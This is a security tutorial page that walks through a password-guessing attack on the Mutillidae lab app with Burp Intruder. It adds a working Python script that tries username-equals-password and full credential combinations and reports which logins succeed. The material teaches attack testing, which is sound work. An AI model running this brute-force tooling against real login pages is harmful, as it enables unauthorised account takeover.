infosecgirls
Appsec

Password Guessing Attack

Last updated 4 years ago

Scenario: check whether any user account exists whose password is the same as its username.

  1. In Mutillidae, open the login page by clicking the "Login/Register" link.

  2. Ensure Burp's Proxy intercept is on, then submit the login form with any username and password.

  3. Intercept the login request and, assuming usernames have already been enumerated, send the request to Intruder.

  4. Mark the username and password parameters as payload positions and choose an appropriate attack type (Pitchfork in this case, because each username must be paired with exactly one password).

  5. For the username position, choose payload type 'Simple list' and load the enumerated username list.

  6. To test the scenario where username and password are the same, choose payload type 'Copy other payload' for the password position and set 'Copy from position' to 1, so that every request carries the username as its password.

Note: To test against a separate list of passwords instead, choose payload type 'Simple list' for the password position and load the desired password list. With Pitchfork the n-th username is paired only with the n-th password; to try every password against every username, switch the attack type to Cluster bomb.

  7. Go to Intruder > Options > Grep - Extract and define the position from which to extract the username returned by the server. If a login succeeds, the username sent in the request matches the username returned in the response; otherwise the two do not match (as per the current system's behavior).

  8. Go to Intruder > Options > Grep - Match and enter a unique string, say 'Logged In User', that appears only in the server's response to a valid login.

  9. Start the attack and check the Grep - Match column added in step 8 together with the username extracted in step 7: a row whose match is flagged and whose extracted username equals the submitted one is a valid login.

  10. Save the attack results and extract the valid username/password combinations.
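The same logic, written out as a script rather than clicked through in Intruder, makes the two checks explicit: Pitchfork with 'Copy other payload' produces username == password pairs, Cluster bomb produces every combination, and a response counts as a valid login only when the Grep - Match marker is present and the Grep - Extract username equals the one submitted. This is an added example, not code from the original page or from Mutillidae; the login URL and the 'username'/'password' field names are assumptions (copy the real ones from the intercepted request), the 'Logged In User' marker is the string the page suggests, and the accounts in `FAKE_ACCOUNTS` are constructed so the script runs offline against a stand-in target.

```python
import itertools
import re
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Assumption: Mutillidae's login form posts 'username' and 'password' to this URL.
# Copy the exact URL and parameters from the request intercepted in Burp if your build differs.
LOGIN_URL = "http://localhost/mutillidae/index.php?page=login.php"

# Grep - Match: a string that appears only in the response to a successful login.
MATCH_MARKER = "Logged In User"
# Grep - Extract: capture the username the server echoes back after login.
EXTRACT_RE = re.compile(r"Logged In User:\s*([^\s<]+)")


def pitchfork(usernames, passwords=None):
    """Pair payloads the way Burp's Pitchfork attack does.

    With passwords=None the password position behaves like 'Copy other payload'
    from position 1, i.e. each request sends password == username.  With a
    separate list, the n-th username is paired with the n-th password only and
    the longer list is truncated (zip semantics).
    """
    if passwords is None:
        return [(u, u) for u in usernames]
    return list(zip(usernames, passwords))


def cluster_bomb(usernames, passwords):
    """Every username against every password (Burp's Cluster bomb attack)."""
    return list(itertools.product(usernames, passwords))


def is_valid_login(sent_username, body):
    """Apply the Grep - Match and Grep - Extract checks to one response body.

    Both are needed: the marker alone would also flag a page that shows some
    other logged-in user, so the echoed username must equal the one submitted.
    """
    if MATCH_MARKER not in body:
        return False
    match = EXTRACT_RE.search(body)
    return match is not None and match.group(1) == sent_username


def http_post(username, password):
    """Send one login attempt to the real target and return the response body."""
    data = urlencode({"username": username, "password": password}).encode()
    with urlopen(Request(LOGIN_URL, data=data)) as resp:
        return resp.read().decode(errors="replace")


def run_attack(pairs, post=http_post):
    """Try each (username, password) pair and return the ones that logged in."""
    return [(u, p) for u, p in pairs if is_valid_login(u, post(u, p))]


# Constructed stand-in for the target so the example runs offline.  These are
# made-up accounts for the dry run, not real credentials on any system.
FAKE_ACCOUNTS = {"admin": "admin", "alice": "Winter2024"}


def fake_post(username, password):
    """Return a body shaped like Mutillidae's login page, without any network."""
    if FAKE_ACCOUNTS.get(username) == password:
        return f"<b>Logged In User: {username} ({username}@example.com)</b>"
    return "<b>Password incorrect</b>"


if __name__ == "__main__":
    users = ["admin", "alice", "bob"]
    # Scenario from the page: password == username (Pitchfork + Copy other payload)
    print("same-as-username:", run_attack(pitchfork(users), post=fake_post))
    # Separate password list: Cluster bomb tries every combination
    print("cluster bomb:", run_attack(cluster_bomb(users, ["admin", "Winter2024"]), post=fake_post))
```

To run it against a live Mutillidae instance, replace `post=fake_post` with the default `http_post` (or route `http_post` through Burp's listener so the requests show up in the Proxy history); against anything other than a lab target, account lockout and rate limiting make the one-password-per-user Pitchfork run the safer first pass.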